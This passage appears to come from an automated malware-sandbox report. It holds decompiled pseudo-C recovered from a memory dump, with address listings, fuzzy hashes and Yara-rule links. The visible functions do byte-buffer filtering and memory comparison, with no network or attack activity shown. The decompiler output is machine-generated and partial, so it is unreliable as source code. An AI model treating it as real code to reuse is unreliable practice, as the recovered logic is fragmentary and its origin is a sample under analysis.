							E00D8E920(_t336, _t355 + 0x40, 0, 0x1c);
							 *(_t355 + 0x34) =  *(_t355 + 0x34) & 0;
							_t355 = _t355 + 0xc;
							 *(_t355 + 0x24) = _t336;
							if(_t336 <  *(_t355 + 0x30)) {
								_t238 =  *(_t355 + 0x60);
								do {
									_t322 =  *(_t355 + 0x1c);
									 *(_t355 + 0x14) = _t322 -  *(_t355 + 0x18);
									_t297 =  *(_t355 + 0x2c);
									 *(_t355 + 0x18) = _t322;
									_t323 =  *_t297 & 0x000000ff;
									 *(_t355 + 0x2c) =  &(_t297[1]);
									_t304 = ( *(_t355 + 0x14) * _t238 + _t345 *  *(_t355 + 0x14) + _t353 *  *(_t355 + 0x1c) +  *(_t355 + 0x20) * 0x00000008 >> 0x00000003 & 0x000000ff) - _t323;
									 *( *(_t355 + 0x24) +  *(_t355 + 0x38)) = _t304;
									_t349 = _t323 << 3;
									 *(_t355 + 0x20) = _t304 -  *(_t355 + 0x20);
									 *(_t355 + 0x24) = _t304;
									 *((intOrPtr*)(_t355 + 0x44)) =  *((intOrPtr*)(_t355 + 0x44)) + E00D94E62(_t323, _t323 << 3);
									 *((intOrPtr*)(_t355 + 0x4c)) =  *((intOrPtr*)(_t355 + 0x4c)) + E00D94E62(_t323, (_t323 << 3) -  *(_t355 + 0x1c));
									 *((intOrPtr*)(_t355 + 0x54)) =  *((intOrPtr*)(_t355 + 0x54)) + E00D94E62(_t323,  *(_t355 + 0x20) + (_t323 << 3));
									 *((intOrPtr*)(_t355 + 0x5c)) =  *((intOrPtr*)(_t355 + 0x5c)) + E00D94E62(_t323, (_t323 << 3) -  *(_t355 + 0x20));
									 *((intOrPtr*)(_t355 + 0x64)) =  *((intOrPtr*)(_t355 + 0x64)) + E00D94E62(_t323,  *(_t355 + 0x24) + _t349);
									 *((intOrPtr*)(_t355 + 0x6c)) =  *((intOrPtr*)(_t355 + 0x6c)) + E00D94E62(_t323, _t349 -  *(_t355 + 0x14));
									 *((intOrPtr*)(_t355 + 0x74)) =  *((intOrPtr*)(_t355 + 0x74)) + E00D94E62(_t323, _t349 +  *(_t355 + 0x14));
									_t355 = _t355 + 0x1c;
									if(( *(_t355 + 0x28) & 0x0000001f) != 0) {
										_t345 =  *(_t355 + 0x10);
										_t238 =  *(_t355 + 0x60);
									} else {
										_t324 =  *(_t355 + 0x40);
										_t266 = 0;
										 *(_t355 + 0x40) =  *(_t355 + 0x40) & 0;
										_t308 = 1;
										do {
											if( *(_t355 + 0x40 + _t308 * 4) < _t324) {
												_t324 =  *(_t355 + 0x40 + _t308 * 4);
												_t266 = _t308;
											}
											 *(_t355 + 0x40 + _t308 * 4) =  *(_t355 + 0x40 + _t308 * 4) & 0x00000000;
											_t308 = _t308 + 1;
										} while (_t308 < 7);
										_t345 =  *(_t355 + 0x10);
										_t267 = _t266 - 1;
										if(_t267 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t353 >= 0xfffffff0) {
												_t353 = _t353 - 1;
											}
											goto L49;
										}
										_t268 = _t267 - 1;
										if(_t268 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t353 < 0x10) {
												_t353 = _t353 + 1;
											}
											goto L49;
										}
										_t269 = _t268 - 1;
										if(_t269 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t345 < 0xfffffff0) {
												goto L49;
											}
											_t345 = _t345 - 1;
											L43:
											 *(_t355 + 0x10) = _t345;
											goto L49;
										}
										_t270 = _t269 - 1;
										if(_t270 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t345 >= 0x10) {
												goto L49;
											}
											_t345 = _t345 + 1;
											goto L43;
										}
										_t271 = _t270 - 1;
										if(_t271 == 0) {
											_t238 =  *(_t355 + 0x60);
											if(_t238 < 0xfffffff0) {
												goto L49;
											}
											_t238 = _t238 - 1;
											L36:
											 *(_t355 + 0x60) = _t238;
											goto L49;
										}
										_t238 =  *(_t355 + 0x60);
										if(_t271 != 1 || _t238 >= 0x10) {
											goto L49;
										} else {
											_t238 = _t238 + 1;
											goto L36;
										}
									}
									L49:
									_t306 =  *(_t355 + 0x24) + _t281;
									 *(_t355 + 0x28) =  *(_t355 + 0x28) + 1;
									 *(_t355 + 0x24) = _t306;
								} while (_t306 <  *(_t355 + 0x30));
								_t336 =  *(_t355 + 0x34);
							}
							_t336 = _t336 + 1;
							 *(_t355 + 0x34) = _t336;
						} while (_t336 < _t281);
						goto L15;
					}
				}
				if(_t311 != 6) {
					goto L15;
				}
				_t309 = __ecx[5];
				_t354 = 0;
				_t325 = __ecx[1];
				 *(_t355 + 0x28) = _t309;
				 *(_t355 + 0x60) = _t309 + _t309;
				if(_t309 > 0x20000 || _t325 > 0x400 || _t325 == 0) {
					goto L98;
				} else {
					_t274 = _t325;
					 *(_t355 + 0x24) = _t325;
					do {
						_t282 = 0;
						_t338 = _t309;
						if(_t309 <  *(_t355 + 0x60)) {
							_t310 =  *(_t355 + 0x60);
							goto L12;
							L12:
							_t275 =  *_t339;
							_t282 = _t282 -  *((intOrPtr*)(_t275 + _t354));
							_t354 = _t354 + 1;
							 *((char*)(_t275 + _t338)) = _t282;
							_t338 = _t338 + _t325;
							if(_t338 < _t310) {
								goto L12;
							} else {
								_t309 =  *(_t355 + 0x28);
								_t274 =  *(_t355 + 0x24);
								goto L14;
							}
						}
						L14:
						_t309 = _t309 + 1;
						_t274 = _t274 - 1;
						 *(_t355 + 0x28) = _t309;
						 *(_t355 + 0x24) = _t274;
					} while (_t274 != 0);
					goto L15;
				}
			}









































































              0x00d7bad1
              0x00d7badb
              0x00d7bae0
              0x00d7bb77
              0x00000000
              0x00d7bb77
              0x00d7bae9
              0x00d7bfc1
              0x00d7bfc4
              0x00d7bfc6
              0x00d7bfc9
              0x00d7bfd2
              0x00d7c033
              0x00000000
              0x00d7c033
              0x00d7bfda
              0x00d7bfdc
              0x00d7bfde
              0x00d7bfe4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d7bfea
              0x00d7bfea
              0x00d7bfea
              0x00d7bfec
              0x00d7bfed
              0x00d7bfee
              0x00d7bff2
              0x00d7bff8
              0x00d7bffc
              0x00d7c00f
              0x00d7c017
              0x00d7c01b
              0x00d7c01b
              0x00d7bffe
              0x00d7c003
              0x00d7c005
              0x00d7c00b
              0x00d7c00b
              0x00d7c003
              0x00d7c01d
              0x00d7c021
              0x00d7c024
              0x00d7c027
              0x00d7c027
              0x00d7c02a
              0x00000000
              0x00d7c02e
              0x00d7baf2
              0x00d7befb
              0x00d7befd
              0x00d7bf06
              0x00000000
              0x00000000
              0x00d7bf0f
              0x00d7bf12
              0x00d7bf18
              0x00000000
              0x00000000
              0x00d7bf22
              0x00d7bf23
              0x00d7bf27
              0x00d7bf2d
              0x00d7bf30
              0x00000000
              0x00000000
              0x00d7bf32
              0x00d7bf3a
              0x00000000
              0x00000000
              0x00d7bf3c
              0x00d7bf40
              0x00d7bf42
              0x00d7bf47
              0x00d7bf4b
              0x00d7bf4f
              0x00d7bf50
              0x00d7bf57
              0x00d7bf5b
              0x00d7bf6a
              0x00d7bf85
              0x00d7bf85
              0x00d7bf8a
              0x00d7bf8e
              0x00d7bf8e
              0x00d7bf92
              0x00d7bf93
              0x00d7bf96
              0x00d7bf9a
              0x00d7bf9f
              0x00d7bfa3
              0x00d7bfa7
              0x00d7bfa7
              0x00d7bfaa
              0x00d7bfab
              0x00d7bfae
              0x00d7bfb2
              0x00d7bfb2
              0x00000000
              0x00d7bfbc
              0x00d7bafb
              0x00d7bdaf
              0x00d7bdb2
              0x00d7bdb5
              0x00d7bdb8
              0x00d7bdbc
              0x00d7bdbf
              0x00d7bdc6
              0x00d7bdca
              0x00d7bdd3
              0x00000000
              0x00d7bdea
              0x00d7bdea
              0x00d7bdec
              0x00d7bdf0
              0x00d7bdf3
              0x00d7bdf7
              0x00d7bdfb
              0x00d7bdfd
              0x00d7be01
              0x00d7be05
              0x00d7be05
              0x00d7be09
              0x00000000
              0x00000000
              0x00d7be0f
              0x00d7be16
              0x00d7be1a
              0x00d7be1c
              0x00d7be20
              0x00d7be24
              0x00d7be28
              0x00d7be2a
              0x00d7be2d
              0x00d7be35
              0x00d7be3b
              0x00d7be49
              0x00d7be5e
              0x00d7be62
              0x00d7be67
              0x00d7be6b
              0x00d7be6e
              0x00d7be74
              0x00d7be84
              0x00d7be8a
              0x00d7be8e
              0x00d7be92
              0x00d7be94
              0x00d7be94
              0x00d7be7a
              0x00d7be7a
              0x00d7be7e
              0x00d7be7e
              0x00d7be74
              0x00d7be98
              0x00d7be9f
              0x00d7bea2
              0x00d7beaa
              0x00d7bead
              0x00d7beb4
              0x00d7beb4
              0x00d7bebe
              0x00d7bec2
              0x00d7bec6
              0x00d7beca
              0x00d7beca
              0x00d7becb
              0x00d7becf
              0x00d7bed8
              0x00d7bedc
              0x00d7beef
              0x00d7bee1
              0x00d7bee5
              0x00d7bee8
              0x00d7beec
              0x00d7beec
              0x00000000
              0x00d7bef3
              0x00d7bdd3
              0x00d7bb04
              0x00d7bb83
              0x00d7bb86
              0x00d7bb88
              0x00d7bb8b
              0x00d7bb91
              0x00d7bb95
              0x00d7bb9e
              0x00000000
              0x00d7bbb8
              0x00d7bbb8
              0x00d7bbba
              0x00d7bbc0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d7bbc2
              0x00d7bbc2
              0x00d7bbc2
              0x00d7bbcb
              0x00d7bbd0
              0x00d7bbd2
              0x00d7bbd7
              0x00d7bbd9
              0x00d7bbde
              0x00d7bbe6
              0x00d7bbea
              0x00d7bbef
              0x00d7bbf3
              0x00d7bbf6
              0x00d7bbfe
              0x00d7bc04
              0x00d7bc08
              0x00d7bc08
              0x00d7bc16
              0x00d7bc1a
              0x00d7bc23
              0x00d7bc27
              0x00d7bc2b
              0x00d7bc54
              0x00d7bc56
              0x00d7bc65
              0x00d7bc69
              0x00d7bc6d
              0x00d7bc76
              0x00d7bc86
              0x00d7bc96
              0x00d7bca6
              0x00d7bcb6
              0x00d7bcc4
              0x00d7bcd1
              0x00d7bcd5
              0x00d7bcdd
              0x00d7bd79
              0x00d7bd7d
              0x00d7bce3
              0x00d7bce3
              0x00d7bce7
              0x00d7bce9
              0x00d7bcef
              0x00d7bcf0
              0x00d7bcf4
              0x00d7bcf6
              0x00d7bcfa
              0x00d7bcfa
              0x00d7bcfc
              0x00d7bd01
              0x00d7bd02
              0x00d7bd07
              0x00d7bd0b
              0x00d7bd0e
              0x00d7bd6d
              0x00d7bd74
              0x00d7bd76
              0x00d7bd76
              0x00000000
              0x00d7bd74
              0x00d7bd10
              0x00d7bd13
              0x00d7bd61
              0x00d7bd68
              0x00d7bd6a
              0x00d7bd6a
              0x00000000
              0x00d7bd68
              0x00d7bd15
              0x00d7bd18
              0x00d7bd51
              0x00d7bd58
              0x00000000
              0x00000000
              0x00d7bd5a
              0x00d7bd5b
              0x00d7bd5b
              0x00000000
              0x00d7bd5b
              0x00d7bd1a
              0x00d7bd1d
              0x00d7bd45
              0x00d7bd4c
              0x00000000
              0x00000000
              0x00d7bd4e
              0x00000000
              0x00d7bd4e
              0x00d7bd1f
              0x00d7bd22
              0x00d7bd39
              0x00d7bd40
              0x00000000
              0x00000000
              0x00d7bd42
              0x00d7bd33
              0x00d7bd33
              0x00000000
              0x00d7bd33
              0x00d7bd27
              0x00d7bd2b
              0x00000000
              0x00d7bd32
              0x00d7bd32
              0x00000000
              0x00d7bd32
              0x00d7bd2b
              0x00d7bd81
              0x00d7bd85
              0x00d7bd87
              0x00d7bd8b
              0x00d7bd8f
              0x00d7bd99
              0x00d7bd99
              0x00d7bd9d
              0x00d7bd9e
              0x00d7bda2
              0x00000000
              0x00d7bdaa
              0x00d7bb9e
              0x00d7bb09
              0x00000000
              0x00000000
              0x00d7bb0b
              0x00d7bb0e
              0x00d7bb10
              0x00d7bb13
              0x00d7bb1a
              0x00d7bb24
              0x00000000
              0x00d7bb3e
              0x00d7bb3e
              0x00d7bb40
              0x00d7bb44
              0x00d7bb44
              0x00d7bb46
              0x00d7bb4c
              0x00d7bb4e
              0x00d7bb4e
              0x00d7bb52
              0x00d7bb52
              0x00d7bb54
              0x00d7bb57
              0x00d7bb58
              0x00d7bb5b
              0x00d7bb5f
              0x00000000
              0x00d7bb61
              0x00d7bb61
              0x00d7bb65
              0x00000000
              0x00d7bb65
              0x00d7bb5f
              0x00d7bb69
              0x00d7bb69
              0x00d7bb6a
              0x00d7bb6d
              0x00d7bb71
              0x00d7bb71
              0x00000000
              0x00d7bb44

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6c4c74c2f3ffcca2386256cfcd69b93a78b242498d9ea3e31f30956b79fc1daa
              • Instruction ID: a884b91f32fd76b3146bcbe77c32a9fb3e808b9353c75f272762e66b26ac485a
              • Opcode Fuzzy Hash: 6c4c74c2f3ffcca2386256cfcd69b93a78b242498d9ea3e31f30956b79fc1daa
              • Instruction Fuzzy Hash: 7BF14B716083518FC724CE29C48466ABBE5FFC9764F188A2EF4CA97355E730E905CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D90113, Relevance: .3, Instructions: 345COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D90113(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}






























              0x00d90113
              0x00d90113
              0x00d90119
              0x00d901a0
              0x00d901a2
              0x00d901a4
              0x00000000
              0x00000000
              0x00d901aa
              0x00d901b0
              0x00d90237
              0x00d90239
              0x00d9023b
              0x00000000
              0x00000000
              0x00d90241
              0x00d90247
              0x00d902ce
              0x00d902d0
              0x00d902d2
              0x00000000
              0x00000000
              0x00d902d8
              0x00d902de
              0x00d90365
              0x00d90367
              0x00d90369
              0x00000000
              0x00000000
              0x00d9036f
              0x00d90375
              0x00d903fc
              0x00d903fe
              0x00d90400
              0x00000000
              0x00000000
              0x00d9040c
              0x00d90494
              0x00d90496
              0x00d90498
              0x00000000
              0x00000000
              0x00d9049e
              0x00d904a4
              0x00d9052b
              0x00d9052d
              0x00d9052f
              0x00d9052f
              0x00000000
              0x00d9052f
              0x00d904b1
              0x00d904b3
              0x00d904cb
              0x00d904d3
              0x00d904d5
              0x00d904ed
              0x00d904f5
              0x00d904f7
              0x00d9050f
              0x00d90517
              0x00d90519
              0x00d90522
              0x00d90522
              0x00000000
              0x00d90519
              0x00d90500
              0x00d90509
              0x00000000
              0x00000000
              0x00000000
              0x00d90509
              0x00d904de
              0x00d904e7
              0x00000000
              0x00000000
              0x00000000
              0x00d904e7
              0x00d904bc
              0x00d904c5
              0x00000000
              0x00000000
              0x00000000
              0x00d904c5
              0x00d9041a
              0x00d9041c
              0x00d90434
              0x00d9043c
              0x00d9043e
              0x00d90456
              0x00d9045e
              0x00d90460
              0x00d90478
              0x00d90480
              0x00d90482
              0x00d9048b
              0x00d9048b
              0x00000000
              0x00d90482
              0x00d90469
              0x00d90472
              0x00000000
              0x00000000
              0x00000000
              0x00d90472
              0x00d90447
              0x00d90450
              0x00000000
              0x00000000
              0x00000000
              0x00d90450
              0x00d90425
              0x00d9042e
              0x00000000
              0x00000000
              0x00000000
              0x00d9042e
              0x00d90382
              0x00d90384
              0x00d9039c
              0x00d903a4
              0x00d903a6
              0x00d903be
              0x00d903c6
              0x00d903c8
              0x00d903e0
              0x00d903e8
              0x00d903ea
              0x00d903f3
              0x00d903f3
              0x00000000
              0x00d903ea
              0x00d903d1
              0x00d903da
              0x00000000
              0x00000000
              0x00000000
              0x00d903da
              0x00d903af
              0x00d903b8
              0x00000000
              0x00000000
              0x00000000
              0x00d903b8
              0x00d9038d
              0x00d90396
              0x00000000
              0x00000000
              0x00000000
              0x00d90396
              0x00d902eb
              0x00d902ed
              0x00d90305
              0x00d9030d
              0x00d9030f
              0x00d90327
              0x00d9032f
              0x00d90331
              0x00d90349
              0x00d90351
              0x00d90353
              0x00d9035c
              0x00d9035c
              0x00000000
              0x00d90353
              0x00d9033a
              0x00d90343
              0x00000000
              0x00000000
              0x00000000
              0x00d90343
              0x00d90318
              0x00d90321
              0x00000000
              0x00000000
              0x00000000
              0x00d90321
              0x00d902f6
              0x00d902ff
              0x00000000
              0x00000000
              0x00000000
              0x00d902ff
              0x00d90254
              0x00d90256
              0x00d9026e
              0x00d90276
              0x00d90278
              0x00d90290
              0x00d90298
              0x00d9029a
              0x00d902b2
              0x00d902ba
              0x00d902bc
              0x00d902c5
              0x00d902c5
              0x00000000
              0x00d902bc
              0x00d902a3
              0x00d902ac
              0x00000000
              0x00000000
              0x00000000
              0x00d902ac
              0x00d90281
              0x00d9028a
              0x00000000
              0x00000000
              0x00000000
              0x00d9028a
              0x00d9025f
              0x00d90268
              0x00000000
              0x00000000
              0x00000000
              0x00d90268
              0x00d901bd
              0x00d901bf
              0x00d901d7
              0x00d901df
              0x00d901e1
              0x00d901f9
              0x00d90201
              0x00d90203
              0x00d9021b
              0x00d90223
              0x00d90225
              0x00d9022e
              0x00d9022e
              0x00000000
              0x00d90225
              0x00d9020c
              0x00d90215
              0x00000000
              0x00000000
              0x00000000
              0x00d90215
              0x00d901ea
              0x00d901f3
              0x00000000
              0x00000000
              0x00000000
              0x00d901f3
              0x00d901c8
              0x00d901d1
              0x00000000
              0x00000000
              0x00000000
              0x00d9011f
              0x00d9011f
              0x00d90126
              0x00d90128
              0x00d90140
              0x00d90140
              0x00d90148
              0x00d9014a
              0x00d90162
              0x00d90162
              0x00d9016a
              0x00d9016c
              0x00d90184
              0x00d90184
              0x00d9018c
              0x00d9018e
              0x00d90197
              0x00d90197
              0x00000000
              0x00d9018e
              0x00d90172
              0x00d90175
              0x00d9017e
              0x00d8fcd6
              0x00d8fcd6
              0x00d90ac7
              0x00d90ac7
              0x00000000
              0x00d9017e
              0x00d90150
              0x00d90153
              0x00d9015c
              0x00000000
              0x00000000
              0x00000000
              0x00d9015c
              0x00d9012e
              0x00d90131
              0x00d9013a
              0x00000000
              0x00000000
              0x00000000
              0x00d9013a

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
              • Instruction ID: 98950f35fc8ca333f5937070cd9d720fada3511e8a160dd26e1a94079e6cb473
              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
              • Instruction Fuzzy Hash: B2C190722052970EDF2D573A957413EBEA16EA27B131E076DE8B2CB1D4FE20C664D630
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D90548, Relevance: .3, Instructions: 341COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D90548(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
